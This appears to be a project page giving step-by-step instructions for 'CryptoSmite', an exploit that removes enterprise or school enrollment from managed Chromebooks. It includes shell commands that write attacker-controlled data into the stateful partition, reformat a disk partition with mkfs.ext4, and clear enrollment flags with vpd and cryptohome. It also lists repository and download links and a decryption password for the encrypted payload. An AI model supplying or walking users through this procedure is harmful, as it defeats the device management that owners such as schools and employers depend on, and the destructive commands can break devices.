CryptoSmite Unenrollment Exploit
FWSmasher, unretained, fallenmoon8080, Catakang#0987

Website Blog GitHub Discord Source

The kernel version of your Chromebook must end with a 0, 1, or 2 to perform this exploit.

An unenrollment exploit that uses stateful files to unenroll.

How it works

Uses stateful backups that allow changing the encrypted contents of the stateful partition to arbritary contents. This data is useful for enrollment status, so it was changed to make the device appear unenrolled. On the OOBE, it starts the AutoEnrollmentController, which chains into the ash ownership system, and then the ownership system checks for a file. If this file exists, it removes firmware management parameters (FWMP).

Performing the exploit

NOTICE: The authors are not responsible for any damage caused by the use of this exploit. Do not contact them for any issues it causes to your device.

    Instructions

  1. Enter into Recovery Mode by holding ESC + Refresh + Power for 2 or 3 seconds. You should be on an "Insert Recovery Media" or "Let's step you through the recovery process" screen.
  2. Check your kernel version for compatibility by pressing TAB and looking at the last digit of the kernver= line. If the last number of the kernver= line is a 0, 1, or 2, your Chromebook is supported and you can downgrade to ChromeOS version 119 or lower. Follow the instructions at the Downgrade Versions section.
    3. If the last number of the kernver= line is a 3, your Chromebook is not supported, and you cannot downgrade to ChromeOS version 119 or lower. Wait for a new unrenrollment exploit or do a dangerous hardware modification here.
  3. On a personal device, download stateful.tar.xz, and the Cryptsetup chroot st.tar.xz. For raw RMA shims, check the SH1MMER discord server. Keep all of these downloads ready before starting.
  4. In the Linux terminal (or WSL) run the following command: git clone https://github.com/FWSmasher/CryptoCrafter.
  5. Afterwards, run this command in your Linux terminal (WSL or real Linux or a virtual machine). IT MUST BE IN THE CLONED DIRECTORY: ./cryptosmite_host.sh .
    6. Prepare the new RMA shim for flashing
  6. Open the Chromebook Recovery Utility extension, and in the top right corner select "Use local image." The image should be the modified RMA shim.
  7. Select the USB drive to flash.
    8. Boot the RMA shim
  8. You will first need to enter recovery mode by pressing ESC + Refresh + Power.
  9. After entering recovery mode, enable developer mode by pressing Ctrl + D on the recovery mode screen.
  10. Developer mode will be blocked by policy as shown in the top left corner of the screen.
  11. Press ESC + Refresh + Power Button again, and then plug in the USB drive you have just flashed.
    12. Running the injected CryptoSmite file
  12. Run cryptosmite.sh in the injected RMA shim.
  13. In the bash shell prompt in the edit stateful bash shell screen, run this command: tar -xvf /mnt/shim_stateful/stateful.tar.xz -C /mnt/stateful exit.
  14. The system will now reboot into verified mode.
  15. You should now press the OK button at the OOBE screen or add user screen.
  16. Once you reach the add user screen, enable developer mode. If you do not reach the add user screen or if it gets stuck, make an issue on the GitHub repository.

    17. To enable developer mode, press ESC + Refresh + Power Button to enter recovery mode, and then press Ctrl + D to enable developer mode.

    From here, there are two ways to proceed. You could stick around for the five-minute wait by pressing Ctrl + D, or skip the developer mode transition.

    How to skip the 5 minute developer mode wait and transition
  17. Once you have reached the "developer mode is on" screen, press ESC + Refresh + Power and boot into an RMA shim.
  18. Select the bash shell, and run the following commands (or add it as a bash script): mkfs.ext4 /dev/mmcblk0p1 -F, mount -o loop,rw /dev/mmcblk0p1 /tmp, touch /tmp/.developer_mode, unmount /tmp && sync, Reboot.
  19. On "enrollment" branch shims, this script is already included within the new menu.

    20. After enabling developer mode using either of the two methods above, you need to boot into the operating system, and run these last two following commands in the VT2 shell (by pressing Ctrl + Alt + F2 and entering `root`, these commands will NOT run in a shim.)

    Quickly after you boot, run these commands: vpd -i RW_VPD -s check_enrollment=0, cryptohome --action=remove_firmware_management_parameters.

    If you do not get the timing right, powerwash the Chromebook and try again. If you got the timing and everything else correct, you are done! Just exit the VT2 bash shell by pressing Ctrl + Alt + F1 and then follow the on-screen instructions to add your personal and school account on the unenrolled device. After all of that is done, you can now enjoy doing whatever you want on that unenrolled Chromebook!

    EXTRA NOTE: Here is the decryption password to decrypt cryptosmite_sh1mmer or the encrypted version of CryptoSmite with SH1MMER: Info-58-immense!NickName_Arabia-710. If you want prebuilt shims that automatically go into CryptoSmite, go visit dl.darkn.bio.